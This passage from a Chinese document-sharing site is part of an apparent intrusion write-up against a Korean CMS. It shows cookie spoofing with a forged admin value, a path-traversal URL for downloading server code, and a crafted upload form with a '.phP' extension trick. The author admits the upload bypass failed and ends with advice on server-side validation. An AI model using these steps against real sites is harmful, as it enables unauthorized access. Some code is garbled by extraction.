2021年对韩国某CMS的一次安全检测(4)电脑资料

上传人:亦明 文档编号:143668202 上传时间:2020-09-01 格式:DOC 页数:7 大小:16.58KB
返回 下载 相关 举报
2021年对韩国某CMS的一次安全检测(4)电脑资料_第1页
第1页 / 共7页
2021年对韩国某CMS的一次安全检测(4)电脑资料_第2页
第2页 / 共7页
2021年对韩国某CMS的一次安全检测(4)电脑资料_第3页
第3页 / 共7页
2021年对韩国某CMS的一次安全检测(4)电脑资料_第4页
第4页 / 共7页
2021年对韩国某CMS的一次安全检测(4)电脑资料_第5页
第5页 / 共7页
点击查看更多>>
资源描述

《2021年对韩国某CMS的一次安全检测(4)电脑资料》由会员分享,可在线阅读,更多相关《2021年对韩国某CMS的一次安全检测(4)电脑资料(7页珍藏版)》请在金锄头文库上搜索。

1、对韩国某CMS的一次安全检测(4)电脑资料 先看看可否使用UPDATE更新员密码,先看一下源代码:33333333333333333333 if ($MB_ID = ROOT & $MB_PW != ) include ./conf/mkpass.php; $crypt_key = ml5300a; $INPUT_PASS = crypt($MB_PW,$crypt_key); if ($INPUT_PASS = $ROOT_PASS) setcookie(MyLootPass , $ROOT_PASS , 0 , /); getTargetLink(./index.php,); else e

2、cho; 这个不是可以cookie欺骗吗?于是打开桂林老兵的mybrowse,打开网站后,点击自定义cookie,把cookie修改为: MyLootPass=mldzOtDVllwqw;PHPSESSID=ae92f7f6cd637f942071b67b8f4881ad,然后刷新一下页面,显示已(看左上角),如图18所示, 这个是前台管理员,在前台管理中,有发公告的地方,并可以上传文件,如图19所示。 后台对文件类型做了一些限制,当我选择php文件时,却弹出一个对话框,如图20所示。 在没有提交上传的时候,就跳出来对话框,说明肯定本地使用Javascript做了验证,所以可以自己构造一个上传

3、表单来突破,于是先下载上传处理文件upload.php文件。构造其地址: .b*k./ez/bbs.php?table=sub1&action=down&where=dat&dtype=up&uid=133&file= ././././bbs/lib/module/upload/upload.php,下载到本地后打开该文件查看其源代码:4444444444444444444 if ($action = upload) if(is_uploaded_file($_POST_FILESupFiletmp_name) $upFile_Ext = explode(. , $_POST_FILESupF

4、ilename); if (strstr(html,php3,inc,asp,jsp , $upFile_Extsizeof($upFile_Ext)-1) echo ; exit; $filesize = $_POST_FILESupFilesize; (略去无关代码) if (is_file(./././table/$table/upload/.$_POST_FILESupFilename) $upname = date(His)._.$_POST_FILESupFilename; move_uploaded_file($_POST_FILESupFiletmp_name, ./././t

5、able/$table/upload/.$upname); else $upname = $_POST_FILESupFilename; move_uploaded_file($_POST_FILESupFiletmp_name, ./././table/$table/upload/.$upname); 好象可以上传PHP文件的,先构建一个上传表单,代码如下: .b*k./ez/bbs/ lib/module/upload/upload.php target=Tmp_Up_Iframe (INPUT type=hidden value=upload name=action) (INPUT ty

6、pe=hidden value=sub1 name=table) (INPUT type=hidden value=200 name=MaxUp_Size) (INPUT type=file name=upFile) (INPUT type=submit value=提交 name=SubmitBtn) 用时将( ) 改为 另存为upload.htm,再次选择一个php文件上传试试,发现并不能上传,如图21所示, 于是上传一个gif.phP文件(linux服务器是区分大小写的)。上传成功后,用IE浏览器浏览(不要用Firefox,不然图片也会变成下载).b*k./ez/bbs/table/su

7、b1/upload/gif.phP 再看一看strstr函数的解释。 语法: string strstr(string haystack, string needle); 本函数将 needle 最先出现在 haystack 处起至 haystack 结束的字符串返回。若找不到 needle 则返回 false。 原来只要文件名后缀包含php3、php、ph、p等类型都不行。没折了,不搞了。 谁知道有什么办法突破,请告知我。 说明:验证个人认为,使用session验证比cookie安全些;还有就是对上传文件格式的验证,一定要在服务器端进行,在客户端验证的话,随便自己在本地构建一个表单就可以轻轻松松绕过了。 通过本次对韩国某CMS系统网站进行检测,用到了LiveHeaders、RefControl插件,通过这些插件来辅助进行安全检查,其 效果还是非常明显的,在本次检测中成功进行突破防盗链、进行了cookie欺骗,对php类型的网站安全检查应该是多了一些实际经验。欢迎跟我进行技术探 讨,我在antian365.论坛中的id是N3tl04D。 模板,内容仅供参考

展开阅读全文
相关资源
相关搜索

当前位置:首页 > 办公文档 > 其它办公文档

电脑版 |金锄头文库版权所有
经营许可证:蜀ICP备13022795号 | 川公网安备 51140202000112号